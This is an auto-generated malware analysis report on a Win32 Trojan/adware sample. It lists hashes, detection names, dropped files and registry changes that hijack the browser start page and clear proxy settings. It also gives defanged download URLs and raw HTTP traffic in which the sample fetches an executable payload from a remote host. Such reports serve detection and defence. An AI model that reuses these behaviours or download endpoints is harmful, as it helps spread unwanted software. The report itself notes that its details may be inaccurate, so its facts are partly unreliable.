Trojan.Win32.FlyStudio_ad79dc900c

by malwarelabrobot on April 25th, 2017 in Malware Descriptions.

not-a-virus:AdWare.Win32.AdLoad.aafqp (Kaspersky), Artemis!AD79DC900C0F (McAfee), ML.Attribute.HighConfidence (Symantec), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm, Adware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: ad79dc900c0fc342983863657e0b003b
SHA1: 2fd88d33eebffe62c2affd56c7d9e611badde530
SHA256: 27b9ed6e179982bf46db0c7016068bca6ff1e6d7b4b4e1fb28fdda56aa1db694
SSDeep: 12288:8GGD0VMJBLA0SLg52v00Vrx8SsiOStlLppZoU7Q1AVtKINNbhbSmobsw9Pen5Iru:8TDW0MDv0mtFOY5pnoUAsNNbdTFwHreF
Size: 584192 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Mail.Ru
Created at: 2017-04-03 14:55:16
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.

Process activity

The Trojan creates the following process(es):

hao123.exe:3776

The Trojan injects its code into the following process(es):

%original file name%.exe:3676

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\hao123\config.ini (36 bytes)
C:\Users\"%CurrentUserName%"\Desktop\hao123Ã‚ÂµÃ‚Â¼Ã‚ÂºÃ‚Â½.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\hao123\hao123.exe (1561 bytes)

Registry activity

The process hao123.exe:3776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"

The process %original file name%.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.2345.com/?k5209809"

[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASAPI32]
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5	File path
a4df5aa48eaa0eaca060773f8ce1949e	c:\Users\"%CurrentUserName%"\AppData\Local\hao123\hao123.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ?????
Product Name: ??????3????
Product Version: 1.0.0.0
Legal Copyright: [?????] ???? 2012 - 2017
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ??????3????..
Comments: ??????3????
Language: Language Neutral

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX0	4096	1339392	0	0	d41d8cd98f00b204e9800998ecf8427e
UPX1	1343488	573440	572416	5.50129	d193fa217090632beb4e2f3f7d911d3f
.rsrc	1916928	12288	10752	3.62022	2766a35487550b191a0a29eb5c8b29cb

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://down.ku122.com/272330304352327324266257270374320302.txt	14.29.32.170
hxxp://down.ku122.com/	14.29.32.170
hxxp://down.ku122.com/favicon.ico	14.29.32.170
hxxp://www.2345.com/?k5209809	42.62.30.180
hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFE/uXQ4cLc0QEGNMJMGmf8=
hxxp://cdn.globalsigncdn.com/rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH
hxxp://cdn.globalsigncdn.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDCbsuynjBBR4wRmkHQ==
hxxp://cdn.globalsigncdn.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDDmLIcmlTqSuuT3NuQ==
hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECECUM6OAwYS6fK4n3BU18+P0=
hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEFOFPQfyqanGG1VNTzSRTwc=
hxxp://down.ku122.com/download/2345/p7_k5209809_TUi9zvUMQ8ZdGsEzPWwZ8pbdZoG.exe	14.29.32.170
hxxp://cdn.globalsigncdn.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDAqEDhBT4Lgi0Ijg9w==
hxxp://ocsp-services.uzto.netdna-cdn.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR5iK7tYk9tqQEoeQhZNkKcAol9bgQUjEPEy22YwaechGnr30oNYJY6w/sCEQCTkoVAAWVxX5R/KI/vyZso
hxxp://gpla1.wac.v2cdn.net/CRL/Omniroot2025.crl
hxxp://cdp1.public-trust.com/CRL/Omniroot2025.crl	93.184.220.20
hxxp://subca.ocsp-certum.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR5iK7tYk9tqQEoeQhZNkKcAol9bgQUjEPEy22YwaechGnr30oNYJY6w/sCEQCTkoVAAWVxX5R/KI/vyZso	23.111.11.211
hxxp://ocsp2.globalsign.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDCbsuynjBBR4wRmkHQ==	104.16.26.216
hxxp://ocsp.globalsign.com/rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH	104.16.24.216
hxxp://www.ku122.com/	14.29.32.170
hxxp://www.ku122.com/favicon.ico	14.29.32.170
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECECUM6OAwYS6fK4n3BU18+P0=	23.46.123.27
hxxp://down.ku122.com/.............txt	14.29.32.170
hxxp://ss.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEFOFPQfyqanGG1VNTzSRTwc=	23.46.123.27
hxxp://ocsp2.globalsign.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDDmLIcmlTqSuuT3NuQ==	104.16.26.216
hxxp://s2.symcb.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFE/uXQ4cLc0QEGNMJMGmf8=	23.46.123.27
hxxp://ocsp2.globalsign.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDAqEDhBT4Lgi0Ijg9w==	104.16.26.216
cpro.baidustatic.com	119.146.74.34
datax.baidu.com	111.202.114.38
opehs.tanx.com	106.11.129.144
hs.qhupdate.com	125.88.193.197
pos.baidu.com	115.239.210.141
atanx.alicdn.com	47.89.65.184
wn.pos.baidu.com	106.39.162.36
tianqi.2345.com	42.62.30.188
hm.baidu.com	220.181.7.190
phs.tanx.com	106.11.129.144
guess.union2.50bang.org
union2.50bang.org

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System
ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECECUM6OAwYS6fK4n3BU18+P0= HTTP/1.1

Cache-Control: max-age = 363986

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Sun, 17 Nov 2013 16:06:48 GMT

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com


HTTP/1.1 200 OK

Server: nginx/1.10.2

Content-Type: application/ocsp-response

Content-Length: 1454

content-transfer-encoding: binary

Cache-Control: max-age=418698, public, no-transform, must-revalidate

Last-Modified: Fri, 21 Apr 2017 22:02:17 GMT

Expires: Fri, 28 Apr 2017 22:02:17 GMT

Date: Mon, 24 Apr 2017 01:45:43 GMT

Connection: keep-alive
0..........0..... .....0......0...0........FC..&..<.0...Y......2017
0421220217Z0s0q0I0... ........H.dI.....3..^B...d6Q....ZL%."..1.m..._).
.a..%...0a.. ...M|......20170421220217Z....20170428220217Z0...*.H.....
.........n..o}4..........F... .,..9...o.g.3^.v=........L..^L...a.>.
..d.S..a.....Z...hS.<Q-..$. pL[... W....1'..].F......W.%...\.G./.3'
......:....6.....2...=."..AQ.[5%...._?:k..../..AFF6.........o.R3.2....
.|..<......b..j..6...rp....T...j3. .L...1..q.d.t....V..#..,.....0..
.0...0..4.......My_e.\....'....j0...*.H........0_1.0...U....US1.0...U.
...VeriSign, Inc.1705..U....Class 3 Public Primary Certification Autho
rity0...161122000000Z..171214235959Z0..1.0...U....US1.0...U....Symante
c Corporation1.0...U....Symantec Trust Network1?0=..U...6Symantec Clas
s 3 PCA - G1 OCSP Responder Certificate 50.."0...*.H.............0....
.........4..IP.....B..h.....]..).]w.!"..a..{...="....._...~.s1.E......
.;...6&/...\2..A....\..T aH:.8lH^.....l.v.$...K=sZf.*.|.%.Pb.......B..
*f.T\w.:.s.... ....9..4..cV...3.qc.c..j<.f.....>1X.I...P%?......
...5R-....Ca14..X.U....u.....:.z.\.k..b.E.v..,.J................0..0..
.U....0.0l..U. .e0c0a..`.H...E....0R0&.. .........hXXp://VVV.symauth.c
om/cps0(.. .......0...hXXp://VVV.symauth.com/rpa0...U.%..0... .......0
...U........0... .....0......0"..U....0...0.1.0...U....TGV-OFF-470...*
.H.............G..\..R.P..e]...N.....m.....4f......b4"8v..b.R....`.Auz
..........2=...@..........5..cWh....J......r...g.h......Kw'...j.@...x.
....<<< skipped >>>

GET /rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH HTTP/1.1

Cache-Control: max-age = 10800

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Thu, 13 Oct 2016 07:50:34 GMT

If-None-Match: "6b9ba9eca642c891cc02365fc6161341647bd9fc"

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.globalsign.com


HTTP/1.1 200 OK

Date: Mon, 24 Apr 2017 01:45:30 GMT

Content-Type: application/ocsp-response

Content-Length: 1518

Connection: keep-alive

Set-Cookie: __cfduid=d18ca84a76b32c566a402811fe02416d51492998330; expires=Tue, 24-Apr-18 01:45:30 GMT; path=/; domain=.globalsign.com; HttpOnly

Last-Modified: Sun, 23 Apr 2017 23:57:25 GMT

Expires: Thu, 27 Apr 2017 23:57:25 GMT

ETag: "c928e2d374665088a12ae522bef2636fe56a734c"

Cache-Control: public, no-transform, must-revalidate

CF-Cache-Status: HIT

Server: cloudflare-nginx

CF-RAY: 3545622f269b4ea8-DME
0..........0..... .....0......0...0......k...,k.....P....5..A..2017042
3235725Z0n0l0D0... .........W......#....*..2..1..`{f.E....P/}..4....K.
.......DN.BG....20170423235725Z....20170427235725Z0...*.H.............
....b...:..;.`.Q.....9.Gk^.nM9........./.!<..V..r..<$..dbt.]...Z
{ .....x...F.........-...........j......:d`...O..I..N...$p%f.>...q.
.?..b.<~.N.z..V24....7..c ]..Z..)v....R`....U.<.......'.....J...
...b,....?uQ..5.......y....cQ....~..../....7.....?..FpBBk........0...0
...0..........H...)....HP..A0...*.H........0W1.0...U....BE1.0...U....G
lobalSign nv-sa1.0...U....Root CA1.0...U....GlobalSign Root CA0...1704
07000000Z..170715000000Z0[1.0...U....BE1.0...U....GlobalSign nv-sa110/
..U...(GlobalSign OCSP for Root R1 - Signer 1.10.."0...*.H............
.0............f.._.M.g.d.z^\C@.F...p...VD..}.....v..9.....i..:m...H=.-
d.0#.|..J..S....d..Z.....a........&............k........;.[.7.........
Y;.7 K.........x;Y:LJV@!z...._4..w...,..A#.fb....)..$...5....?....M..{
O^.t.3.U.b..6H...J....o...g..!.."..{*.........O..2..J8xK........0..0..
.U...........0...U.%..0... .......0...U.......0.0...U......k...,k.....
P....5..A0...U.#..0...`{f.E....P/}..4....K0... .....0......0L..U. .E0C
0A.. .....2._0402.. ........&hXXps://VVV.globalsign.com/repository/0..
.*.H.............1(..-x.*.RwJek..S..Ww..C.....A...%...`.........Zs...p
.!)....a......2,......l.&.}...2..z..f....K.v.U\....9..~`.......h.q.Tr.
......h..z.U.RMO.,..H..,x&on.....P.f..[r...:.....wvS.J..mb..96P..SQ..(
..?(....y.:...e|..?.....5.uK$q......n...j.8.w......1..z...Fl.s...<<< skipped >>>

GET /download/2345/p7_k5209809_TUi9zvUMQ8ZdGsEzPWwZ8pbdZoG.exe HTTP/1.1

Host: down.ku122.com

Accept: */*

Referer: hXXp://down.ku122.com/download/2345

User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)

Range: bytes=43077222-

Pragma: no-cache

Cache-Control: no-cache

Connection: close


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Last-Modified: Mon, 21 Nov 2016 03:53:09 GMT

Accept-Ranges: bytes

ETag: "57869c6aa43d21:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 24 Apr 2017 01:45:47 GMT

Connection: close

Content-Length: 64615834

Content-Range: bytes 43077222-107693055/107693056
.a,.;t..6.......??..~..Y....z2E.h.=.......Jz1~F.6Aq./.'.-!............
D...%.A......@.T.....9.....3.@4v...J.-I..`.dh...Gl.P.......X.3=e.Up..%
..K.-6....L..G..U.0f!....{D&...{..\..?....Z.7.$%8J...!B;|..H.....!9~..
...G2.q).i.).D .....Y..(I....=...`.p...........k.,......R..I:..mz..&k.
z.J4...x-%.r......X.....,{..!.^.......\mG..1&..:...t...C>.O%aP.X=..
L.....E6..P..q....4X.]..........Z.....;.*.g8x>...->............'
...%.>."...#..>K^,J..]....M.&CCy.b...<....t._.&?...E...p.6.^.
.F....w.....j~.p@...`........5ej.4.....n...d.B.....gC.......y...l.XfO8
4.o......K......o...9....Y`.W`..'y....7].f...&.?>.U....a[.3........
g0^.b.yw\....L...P...!V.N^....L..6.....!J.c....2..}.-).t..".S...2.lR#.
.4.....<. r.=G...}>.....z..p.Q..........7.B..F....z.....Y..r(...
........$...:..*.V{.nU.m).u...X..t....nA..9..,........t..V..Xk.z..gG..
Z...N.cV......o...w..e.....n.".!....\2..6...u"..@y.......a....9M.l....
....{.\...2V....D.}@.....-...y......h.2..H,]Q.Vwpt..........CY6.....&l
t;.P...(...e....gN......Vb...^9.."..o..f........=..V.R8.CS.ip^jfe.R1).
..?....P.`..9..R..[L..,.w3..ZS........{VH...&.,......,Z..#.\R8.\...=w.
....D..."V]=.v/P....2~.L..#...j.N...-0.=..rU.h?.......s.L.....W...C#E.
.......M..x..`..j.G..C...Wo;.=K.Ec....6..l.5..wY...0eA....5.m.O.w."...
&....R...O|#T..yA..M.'.v......i......p.c..9.p&.w.'.U.'V......GGF......
.$...K .t..}#...|P...Q...c`d.e ......@...y.m..e7..{....Z.Ke....J.>.
|~._....}....!...G......`...R.3...:. ...8.*nd.8..".A..;..z...BQ.Y.....
.1..c......zC.. |6...p...~6.....cb#.......o.. .sV.wb.JFik.g,.....:<<< skipped >>>

GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR5iK7tYk9tqQEoeQhZNkKcAol9bgQUjEPEy22YwaechGnr30oNYJY6w/sCEQCTkoVAAWVxX5R/KI/vyZso HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: subca.ocsp-certum.com


HTTP/1.1 200 OK

Date: Mon, 24 Apr 2017 01:45:49 GMT

Content-Type: application/ocsp-response

Content-Length: 1657

Connection: keep-alive

Content-transfer-encoding: binary

X-Cached: MISS

Server: NetDNA-cache/2.2

X-Cache: HIT
0..u......n0..j.. .....0.....[0..W0..0........0..1.0...U....PL1!0...U.
...Asseco Data Systems S.A.1'0%..U....Certum Certification Authority1%
0#..U....Certum CA Validation Service..20170424013955Z0r0p0H0... .....
.y...bOm..(y.Y6B...}n...C..m.....i..J.`.:........@.eq_..(....(....2017
0424013955Z....20170501013955Z..0.0... .....0....0... .....0..0...*.H.
..........;.:....4.....9.....D..).,.n:X..z^L...E.7....c.".....t. ...&l
t;C...J...w.......O..@e....[\.o......(FVo....~.n...H....;.`..n....E.{.
.a.{..%J.....t.r.......SK..E;........].".?.`...#......_...\...N{3G>
..J....W. .b.5y.....Y=..'!x.$..S...&B..'..u.. ..n.v...F.Wibm4J....0...
0...0....................#=Xr..Q0...*.H........0>1.0...U....PL1.0..
.U....Unizeto Sp. z o.o.1.0...U....Certum CA0...161220101836Z..1801201
01836Z0..1.0...U....PL1!0...U....Asseco Data Systems S.A.1'0%..U....Ce
rtum Certification Authority1%0#..U....Certum CA Validation Service0..
"0...*.H.............0..........3..>......]{7..\...$vl.....V......T
...-.:.....y..'...X..}.fA\...._.Uxl6.ti %.SS..#. Z.5.G"..S.....)Q...!.
.P....~0..32...Bmd...%.2...D.....J.........6....O.u..vm.l..V.'.L.4.._.
...\.eK...MI.F.;H.;..%...KZ...H;e ..9.2..A.b......F.T..._........DY2..
.2Z#L.D0)........0..0...U.......0.0...U.......L.oh.....2......|.=0R..U
.#.K0I.B.@0>1.0...U....PL1.0...U....Unizeto Sp. z o.o.1.0...U....Ce
rtum CA.... 0...U...........0...U.%..0... .......0... .....0......0...
*.H.............,.....D...,.c...<..............G..~Uug.....q6).g&..
."....B..k...{.(.S... 5...x.>......K.ks.....S...]R......n....q.<<< skipped >>>

GET /.............txt HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: down.ku122.com

Cache-Control: no-cache


HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Fri, 17 Mar 2017 03:37:17 GMT

Accept-Ranges: bytes

ETag: "a3a598c6cf9ed21:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 24 Apr 2017 01:44:46 GMT

Content-Length: 4239
==================..............====================..[..........]VVV.
xxm4.com[..........]..[..........]........[..........]..==============
======================================..==================2345........
......thedeaf....hXXp://jifen.2345.com/====================......2016-
11-18..[..........]hXXp://down.ku122.com/download/2345/p7_k5209809_TUi
9zvUMQ8ZdGsEzPWwZ8pbdZoG.exe[..........]..[..........]QQ......[.......
...]..====================================================..==========
========9e............................1154995208....hXXp://VVV.919yi.c
om/====================......2016-09-02..[............]hXXp://dl.919yi
.com/pc_single/9e_qqpcmgr_ID=513044,QAV=123243260,.exe[............]..
[............]QQ....[............]..==================================
==================..==================9e............................11
54995208....hXXp://VVV.919yi.com/====================......2016-09-02.
.[............]hXXp://dl.919yi.com/pc_single/9e_Liebao_ID=513044,KSB=2
40574,.exe[............]..[............]..........[............]..====
================================================..==================23
45..............thedeaf....hXXp://jifen.2345.com/====================.
.....2016-11-18..[............]hXXp://down.ku122.com/download/2345/p7_
k5209809_TUi9zvUMQ8ZdGsEzPWwZ8pbdZoG.exe[............]..[............]
2345......[............]..============================================
========..=============================..........=====================
============..=================........4====================..[zmx<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEFOFPQfyqanGG1VNTzSRTwc= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ss.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.10.2

Content-Type: application/ocsp-response

Content-Length: 1609

content-transfer-encoding: binary

Cache-Control: max-age=417137, public, no-transform, must-revalidate

Last-Modified: Fri, 21 Apr 2017 21:36:43 GMT

Expires: Fri, 28 Apr 2017 21:36:43 GMT

Date: Mon, 24 Apr 2017 01:45:49 GMT

Connection: keep-alive
0..E......>0..:.. .....0..... 0..'0......E ....e.u.....x..7....2017
0421213643Z0s0q0I0... ..........d.....k... P.....d.._`.a.U..C..`*..z.C
....S.=......UMO4.O.....20170421213643Z....20170428213643Z0...*.H.....
........L.0....."......!.;[..8.Sa. D.......T.....F.g.....c.Hh_b"..LY .
..f<z.\...k.xG./J.r.i..K.T.8..Z..Q....].QT%9.....-R..4...V.|....f..
...;.....&..|....cW~.[O)..>..j7B..S.'VJ<6q....nG~.S.....z......`
tXU......HtBv.....8.<........\CMO.......a.?y......^.5U.......g)...n
0..j0..f0..N.......Dh.ciH.........!0...*.H........0~1.0...U....US1.0..
.U....Symantec Corporation1.0...U....Symantec Trust Network1/0-..U...&
Symantec Class 3 Secure Server CA - G40...170204000000Z..170505235959Z
0@1>0<..U...5Symantec Class 3 Secure Server CA - G4 OCSP Respond
er0.."0...*.H.............0......... B.}.@...E2.......&kg.#.c..7f#0...
.!....Z.G..|.o..W{2.m.l.cM...%......V.Wx6I.t....Q,U^......;.U<ie...
X.{.6. .4...ep....q..OuV...F...s.f....!....K....O....Oj.?Yd6^Mlw.6.k..
*./.......b..Q4...H.s.........(...toW...9...............&...D...{T{...
.....4.;/pa<...........0...0... .....0......0"..U....0...0.1.0...U.
...TGV-D-38570...U.#..0..._`.a.U..C..`*..z.C..0...U......E ....e.u....
.x..7..0...U.......0.0n..U. .g0e0c..`.H...E....0T0&.. .........hXXp://
VVV.symauth.com/cps0*.. .......0...  hXXp://VVV.symauth.com/rpa0...U.%
..0... .......0...U...........0...*.H.............x..b5XG.........T^2.
....T..............zq.............f....#|.....P...R.....]...la.(.21{..
.C.....K.....R..H.b....3L..52}5.8.......%.......l=..$X$_..01.3....<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEFOFPQfyqanGG1VNTzSRTwc= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ss.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.10.2

Content-Type: application/ocsp-response

Content-Length: 1609

content-transfer-encoding: binary

Cache-Control: max-age=417137, public, no-transform, must-revalidate

Last-Modified: Fri, 21 Apr 2017 21:36:43 GMT

Expires: Fri, 28 Apr 2017 21:36:43 GMT

Date: Mon, 24 Apr 2017 01:45:49 GMT

Connection: keep-alive
0..E......>0..:.. .....0..... 0..'0......E ....e.u.....x..7....2017
0421213643Z0s0q0I0... ..........d.....k... P.....d.._`.a.U..C..`*..z.C
....S.=......UMO4.O.....20170421213643Z....20170428213643Z0...*.H.....
........L.0....."......!.;[..8.Sa. D.......T.....F.g.....c.Hh_b"..LY .
..f<z.\...k.xG./J.r.i..K.T.8..Z..Q....].QT%9.....-R..4...V.|....f..
...;.....&..|....cW~.[O)..>..j7B..S.'VJ<6q....nG~.S.....z......`
tXU......HtBv.....8.<........\CMO.......a.?y......^.5U.......g)...n
0..j0..f0..N.......Dh.ciH.........!0...*.H........0~1.0...U....US1.0..
.U....Symantec Corporation1.0...U....Symantec Trust Network1/0-..U...&
Symantec Class 3 Secure Server CA - G40...170204000000Z..170505235959Z
0@1>0<..U...5Symantec Class 3 Secure Server CA - G4 OCSP Respond
er0.."0...*.H.............0......... B.}.@...E2.......&kg.#.c..7f#0...
.!....Z.G..|.o..W{2.m.l.cM...%......V.Wx6I.t....Q,U^......;.U<ie...
X.{.6. .4...ep....q..OuV...F...s.f....!....K....O....Oj.?Yd6^Mlw.6.k..
*./.......b..Q4...H.s.........(...toW...9...............&...D...{T{...
.....4.;/pa<...........0...0... .....0......0"..U....0...0.1.0...U.
...TGV-D-38570...U.#..0..._`.a.U..C..`*..z.C..0...U......E ....e.u....
.x..7..0...U.......0.0n..U. .g0e0c..`.H...E....0T0&.. .........hXXp://
VVV.symauth.com/cps0*.. .......0...  hXXp://VVV.symauth.com/rpa0...U.%
..0... .......0...U...........0...*.H.............x..b5XG.........T^2.
....T..............zq.............f....#|.....P...R.....]...la.(.21{..
.C.....K.....R..H.b....3L..52}5.8.......%.......l=..$X$_..01.3....<<< skipped >>>

GET /favicon.ico HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: VVV.ku122.com

Connection: Keep-Alive


HTTP/1.1 404 Not Found

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 24 Apr 2017 01:45:00 GMT

Content-Length: 1163
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=gb2312"/>..<title>404 - ..
................</title>..<style type="text/css">..<!--
..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, 
sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} .
.h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0
;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;
